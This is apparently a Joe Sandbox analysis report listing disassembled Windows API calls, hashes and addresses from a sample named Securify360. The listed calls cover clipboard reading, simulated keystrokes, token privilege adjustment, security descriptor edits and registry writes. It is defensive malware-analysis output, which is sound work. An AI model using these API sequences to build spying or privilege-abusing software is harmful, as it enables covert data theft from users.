                                                                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0101D28E
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0101D2B8
                                                                                              • SendMessageW.USER32 ref: 0101D2E1
                                                                                              • _wcsncpy.LIBCMT ref: 0101D359
                                                                                              • GetKeyState.USER32(00000011), ref: 0101D37A
                                                                                              • GetKeyState.USER32(00000009), ref: 0101D387
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0101D39D
                                                                                              • GetKeyState.USER32(00000010), ref: 0101D3A7
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0101D3D0
                                                                                              • SendMessageW.USER32 ref: 0101D3F7
                                                                                              • SendMessageW.USER32(?,00001030,?,0101B9BA), ref: 0101D4FD
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0101D513
                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0101D526
                                                                                              • SetCapture.USER32(?), ref: 0101D52F
                                                                                              • ClientToScreen.USER32(?,?), ref: 0101D594
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0101D5A1
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0101D5BB
                                                                                              • ReleaseCapture.USER32 ref: 0101D5C6
                                                                                              • GetCursorPos.USER32(?), ref: 0101D600
                                                                                              • ScreenToClient.USER32(?,?), ref: 0101D60D
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0101D669
                                                                                              • SendMessageW.USER32 ref: 0101D697
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0101D6D4
                                                                                              • SendMessageW.USER32 ref: 0101D703
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0101D724
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0101D733
                                                                                              • GetCursorPos.USER32(?), ref: 0101D753
                                                                                              • ScreenToClient.USER32(?,?), ref: 0101D760
                                                                                              • GetParent.USER32(?), ref: 0101D780
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0101D7E9
                                                                                              • SendMessageW.USER32 ref: 0101D81A
                                                                                              • ClientToScreen.USER32(?,?), ref: 0101D878
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0101D8A8
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0101D8D2
                                                                                              • SendMessageW.USER32 ref: 0101D8F5
                                                                                              • ClientToScreen.USER32(?,?), ref: 0101D947
                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0101D97B
                                                                                                • Part of subcall function 00F929AB: GetWindowLongW.USER32(?,000000EB), ref: 00F929BC
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0101DA17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3977979337-4164748364
                                                                                              • Opcode ID: 27fccca18d57eca30c53b676bb601078656f408af01836d77c0e114d7b918dab
                                                                                              • Instruction ID: 84a93a8fd3fe0574d556ffc9b1b719bfc730a2a8d14e59ee3aa011511814195c
                                                                                              • Opcode Fuzzy Hash: 27fccca18d57eca30c53b676bb601078656f408af01836d77c0e114d7b918dab
                                                                                              • Instruction Fuzzy Hash: 6642AC35204341AFDB71CFA8C848BAABFE5FF48310F140659F6D5872A9C77A9848DB91
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(00000000,?), ref: 00FA5EE2
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FE10D7
                                                                                              • IsIconic.USER32(?), ref: 00FE10E0
                                                                                              • ShowWindow.USER32(?,00000009), ref: 00FE10ED
                                                                                              • SetForegroundWindow.USER32(?), ref: 00FE10F7
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FE110D
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00FE1114
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FE1120
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FE1131
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FE1139
                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FE1141
                                                                                              • SetForegroundWindow.USER32(?), ref: 00FE1144
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE1159
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00FE1164
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE116E
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00FE1173
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE117C
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00FE1181
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE118B
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00FE1190
                                                                                              • SetForegroundWindow.USER32(?), ref: 00FE1193
                                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00FE11BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 4125248594-2988720461
                                                                                              • Opcode ID: b09db67dac8218768c2ac2c6441ec1501209058ccf4c2ce72b34dcb7289d326e
                                                                                              • Instruction ID: 8566d1783984bc2232f15d53b5c183dc1a6a190e28d08088e76bf2e4015562ee
                                                                                              • Opcode Fuzzy Hash: b09db67dac8218768c2ac2c6441ec1501209058ccf4c2ce72b34dcb7289d326e
                                                                                              • Instruction Fuzzy Hash: B6316771A403587FEB305F629C49F7F7E6CEB44B60F204015FA44AA1C5CA795D40ABA1
                                                                                              APIs
                                                                                                • Part of subcall function 00FE9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE93E3
                                                                                                • Part of subcall function 00FE9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE9410
                                                                                                • Part of subcall function 00FE9399: GetLastError.KERNEL32 ref: 00FE941D
                                                                                              • _memset.LIBCMT ref: 00FE8F71
                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FE8FC3
                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE8FD4
                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FE8FEB
                                                                                              • GetProcessWindowStation.USER32 ref: 00FE9004
                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 00FE900E
                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FE9028
                                                                                                • Part of subcall function 00FE8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FE8F27), ref: 00FE8DFE
                                                                                                • Part of subcall function 00FE8DE9: CloseHandle.KERNEL32(?,?,00FE8F27), ref: 00FE8E10
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                              • String ID: $default$winsta0
                                                                                              • API String ID: 2063423040-1027155976
                                                                                              • Opcode ID: 5607324f3f231b5d4c75895835ab0b4d2952543982e64b44ed492aad9e7b3459
                                                                                              • Instruction ID: db875990018bdf11279b666b8f763a4575e7bbbf2d86d2d967fe267f79885fb6
                                                                                              • Opcode Fuzzy Hash: 5607324f3f231b5d4c75895835ab0b4d2952543982e64b44ed492aad9e7b3459
                                                                                              • Instruction Fuzzy Hash: A181ADB1D04289BFDF219FA1CC49AEE7B79FF08314F144119F954A2264D77A8E05EB60
                                                                                              APIs
                                                                                              • OpenClipboard.USER32(01020980), ref: 0100465C
                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0100466A
                                                                                              • GetClipboardData.USER32(0000000D), ref: 01004672
                                                                                              • CloseClipboard.USER32 ref: 0100467E
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0100469A
                                                                                              • CloseClipboard.USER32 ref: 010046A4
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 010046B9
                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 010046C6
                                                                                              • GetClipboardData.USER32(00000001), ref: 010046CE
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 010046DB
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0100470F
                                                                                              • CloseClipboard.USER32 ref: 0100481F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                              • String ID:
                                                                                              • API String ID: 3222323430-0
                                                                                              • Opcode ID: defc22f8540c97108ded3984bb19e366294e65232f7992a972256ad9f7e4a378
                                                                                              • Instruction ID: b6986a8c9d4f5d0e119416f757dd40482d88bf6b608100d117d139abc132be59
                                                                                              • Opcode Fuzzy Hash: defc22f8540c97108ded3984bb19e366294e65232f7992a972256ad9f7e4a378
                                                                                              • Instruction Fuzzy Hash: F451E171204301ABE321EF64DC89F6E77A8AF88B10F10452AF6C6D21D5EF79D905CB66
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00FFCDD0
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FFCE24
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFCE49
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFCE60
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFCE87
                                                                                              • __swprintf.LIBCMT ref: 00FFCED3
                                                                                              • __swprintf.LIBCMT ref: 00FFCF16
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                              • __swprintf.LIBCMT ref: 00FFCF6A
                                                                                                • Part of subcall function 00FB38C8: __woutput_l.LIBCMT ref: 00FB3921
                                                                                              • __swprintf.LIBCMT ref: 00FFCFB8
                                                                                                • Part of subcall function 00FB38C8: __flsbuf.LIBCMT ref: 00FB3943
                                                                                                • Part of subcall function 00FB38C8: __flsbuf.LIBCMT ref: 00FB395B
                                                                                              • __swprintf.LIBCMT ref: 00FFD007
                                                                                              • __swprintf.LIBCMT ref: 00FFD056
                                                                                              • __swprintf.LIBCMT ref: 00FFD0A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                              • API String ID: 3953360268-2428617273
                                                                                              • Opcode ID: 8da897b1b944882c718c2cd82aa8c712e3ef6151fc5d38ec54053f05afda250a
                                                                                              • Instruction ID: 2429d408216c3025664b2a17400767bea4d5f7cb1683bf68e9a953e73ad453df
                                                                                              • Opcode Fuzzy Hash: 8da897b1b944882c718c2cd82aa8c712e3ef6151fc5d38ec54053f05afda250a
                                                                                              • Instruction Fuzzy Hash: C3A13EB2404305ABD710EFA4DD85DAFB7ECBF95704F400919F585C6191EB38EA09DBA2
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00FFF5F9
                                                                                              • _wcscmp.LIBCMT ref: 00FFF60E
                                                                                              • _wcscmp.LIBCMT ref: 00FFF625
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00FFF637
                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00FFF651
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00FFF669
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FFF674
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00FFF690
                                                                                              • _wcscmp.LIBCMT ref: 00FFF6B7
                                                                                              • _wcscmp.LIBCMT ref: 00FFF6CE
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFF6E0
                                                                                              • SetCurrentDirectoryW.KERNEL32(0104B578), ref: 00FFF6FE
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFF708
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FFF715
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FFF727
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1803514871-438819550
                                                                                              • Opcode ID: 2b1647604e4c18ac04ab65b09816e13ec24d4c49d9fb14793e7b7578e7e68d6b
                                                                                              • Instruction ID: ca205609782d4a1d5934bd3c8b75217ade06a149fa95b77cb92cddcbe83cafed
                                                                                              • Opcode Fuzzy Hash: 2b1647604e4c18ac04ab65b09816e13ec24d4c49d9fb14793e7b7578e7e68d6b
                                                                                              • Instruction Fuzzy Hash: D831D872A4031DABDB20AEB5DC49AEEB7AC9F09331F200165F944D21A4DF75DA48DF60
                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01010FB3
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,01020980,00000000,?,00000000,?,?), ref: 01011021
                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01011069
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 010110F2
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 01011412
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0101141F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 536824911-966354055
                                                                                              • Opcode ID: e09b2428be22d7c6664f182d66f10d1b19bffeb6cd5b0bdbd2f52deec75c82b2
                                                                                              • Instruction ID: abd2b269a6b5cdbe90083003e5c8e703b61be6c7c2d0c3acc7b26b99e6a951ee
                                                                                              • Opcode Fuzzy Hash: e09b2428be22d7c6664f182d66f10d1b19bffeb6cd5b0bdbd2f52deec75c82b2
                                                                                              • Instruction Fuzzy Hash: 10027B752006019FDB15EF29C881E6AB7E5FF89714F04855DF9899B361DB38EC06CB81
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00FFF756
                                                                                              • _wcscmp.LIBCMT ref: 00FFF76B
                                                                                              • _wcscmp.LIBCMT ref: 00FFF782
                                                                                                • Part of subcall function 00FF4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FF4890
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00FFF7B1
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FFF7BC
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00FFF7D8
                                                                                              • _wcscmp.LIBCMT ref: 00FFF7FF
                                                                                              • _wcscmp.LIBCMT ref: 00FFF816
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFF828
                                                                                              • SetCurrentDirectoryW.KERNEL32(0104B578), ref: 00FFF846
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFF850
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FFF85D
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FFF86F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1824444939-438819550
                                                                                              • Opcode ID: 894d760f5df9426a035ee0c6b197946ba326b41c85fcb3e710992f24513a6544
                                                                                              • Instruction ID: 1dffd723fc9887f469ae31fe6a9c7beadbd1dbc362c8d9f7b08e78433d53e56f
                                                                                              • Opcode Fuzzy Hash: 894d760f5df9426a035ee0c6b197946ba326b41c85fcb3e710992f24513a6544
                                                                                              • Instruction Fuzzy Hash: 3531DA7294031DABDB20AE75DC88AEEB76C9F05370F240175F944A21B0DB35DE49EB50
                                                                                              APIs
                                                                                                • Part of subcall function 00FE8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE8E3C
                                                                                                • Part of subcall function 00FE8E20: GetLastError.KERNEL32(?,00FE8900,?,?,?), ref: 00FE8E46
                                                                                                • Part of subcall function 00FE8E20: GetProcessHeap.KERNEL32(00000008,?,?,00FE8900,?,?,?), ref: 00FE8E55
                                                                                                • Part of subcall function 00FE8E20: HeapAlloc.KERNEL32(00000000,?,00FE8900,?,?,?), ref: 00FE8E5C
                                                                                                • Part of subcall function 00FE8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8E73
                                                                                                • Part of subcall function 00FE8EBD: GetProcessHeap.KERNEL32(00000008,00FE8916,00000000,00000000,?,00FE8916,?), ref: 00FE8EC9
                                                                                                • Part of subcall function 00FE8EBD: HeapAlloc.KERNEL32(00000000,?,00FE8916,?), ref: 00FE8ED0
                                                                                                • Part of subcall function 00FE8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FE8916,?), ref: 00FE8EE1
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FE8931
                                                                                              • _memset.LIBCMT ref: 00FE8946
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FE8965
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00FE8976
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00FE89B3
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FE89CF
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00FE89EC
                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FE89FB
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00FE8A02
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FE8A23
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00FE8A2A
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FE8A5B
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FE8A81
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FE8A95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3996160137-0
                                                                                              • Opcode ID: e57256580c5c45f28cb471151e556461883801fccd697176f45bb7d210f17c59
                                                                                              • Instruction ID: 8c2bd51bea64c56ea7486b80da97fb8a75b5cfb92b78a971b55e66859c23eccc
                                                                                              • Opcode Fuzzy Hash: e57256580c5c45f28cb471151e556461883801fccd697176f45bb7d210f17c59
                                                                                              • Instruction Fuzzy Hash: 74618170900249BFDF20EF92DC85EEEBB79FF04750F14416AF815A6290DB399902DB60
                                                                                              APIs
                                                                                                • Part of subcall function 0101147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01010B0C
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 01010BAB
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 01010C43
                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01010E82
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 01010E8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1240663315-0
                                                                                              • Opcode ID: f923c4c1cc61fc94455f0d2cdaed716d4769375025a9969739118be6c033ba90
                                                                                              • Instruction ID: c13febbd44c7a96836c2caf6ed919be1ee9b524669de9f4fd16fc3e0f6487602
                                                                                              • Opcode Fuzzy Hash: f923c4c1cc61fc94455f0d2cdaed716d4769375025a9969739118be6c033ba90
                                                                                              • Instruction Fuzzy Hash: 8CE16D71204310AFDB24DF29C895E2EBBE4FF89714F04856DF889DB269DA39E841CB51
                                                                                              APIs
                                                                                              • __swprintf.LIBCMT ref: 00FF4451
                                                                                              • __swprintf.LIBCMT ref: 00FF445E
                                                                                                • Part of subcall function 00FB38C8: __woutput_l.LIBCMT ref: 00FB3921
                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00FF4488
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00FF4494
                                                                                              • LockResource.KERNEL32(00000000), ref: 00FF44A1
